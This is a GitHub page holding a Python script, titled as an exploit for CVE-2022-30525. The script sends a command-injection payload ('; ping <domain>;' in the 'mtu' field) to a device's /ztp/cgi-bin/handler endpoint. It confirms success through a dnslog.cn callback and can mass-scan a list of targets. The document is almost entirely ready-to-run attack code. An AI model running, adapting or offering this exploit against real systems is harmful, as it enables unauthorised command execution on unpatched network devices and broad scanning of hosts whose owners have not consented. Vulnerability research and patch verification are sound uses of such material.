-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2022-30525.py
84 lines (69 loc) · 2.74 KB
/
CVE-2022-30525.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
#!/usr/bin/python3
import random, sys, urllib3, json, time, requests
from optparse import OptionParser
urllib3.disable_warnings()
class detection(object):
def __init__(self, option):
self.option = option
self.url = options.url
self.file = options.ip_file
self.res = requests.session()
def dnslogFetch(self):
target = random.random()
url = f"http://www.dnslog.cn/getdomain.php?t={target}"
res1 = self.res.get(url=url)
if res1.status_code == 200 and "dnslog" in res1.text:
return res1.text
else:
print("Unable to discover DNSLog")
def identification(self):
target_url = self.url + "/ztp/cgi-bin/handler"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
"Content-Type": "application/json"
}
extractedlog = self.dnslogFetch()
print(extractedlog)
data = {
"command": "setWanPortSt",
"proto": "dhcp",
"port": "4",
"vlan_tagged": "1",
"vlanid": "5",
"mtu": f"; ping {extractedlog};",
"data": "hi"
}
try:
response = requests.post(url=target_url, headers=headers, data=json.dumps(data), timeout=5, verify=False)
except Exception as e:
pass
time.sleep(5)
url_record = f"http://www.dnslog.cn/getrecords.php?t={random.random()}"
print(self.res.get(url=url_record).text)
if extractedlog in self.res.get(url=url_record).text:
print(f"{self.url} is vulnerable to CVE-2022-30525")
else:
print(f"{self.url} is not vulnerable to CVE-2022-30525")
def BulkScan(self):
with open(self.file, "r+") as urls:
for url in urls:
url = url.strip()
if url[:4] != "http":
url = "http://" + url
self.url = url.strip()
detection.identification(self)
def banner():
print("""CVE-2022-30525 exploit for Single and Multiple Targets""")
if __name__ == "__main__":
banner()
parser = OptionParser()
parser.add_option("-iL", "--bulk", dest="ip_file", help="File containing list of URLs")
parser.add_option("-u", "--single", dest="url", type="string", help="Target URL Address")
(options, args) = parser.parse_args()
if options.url:
detection(options).identification()
elif options.ip_file:
detection(options).BulkScan()
else:
parser.print_help()
sys.exit(1)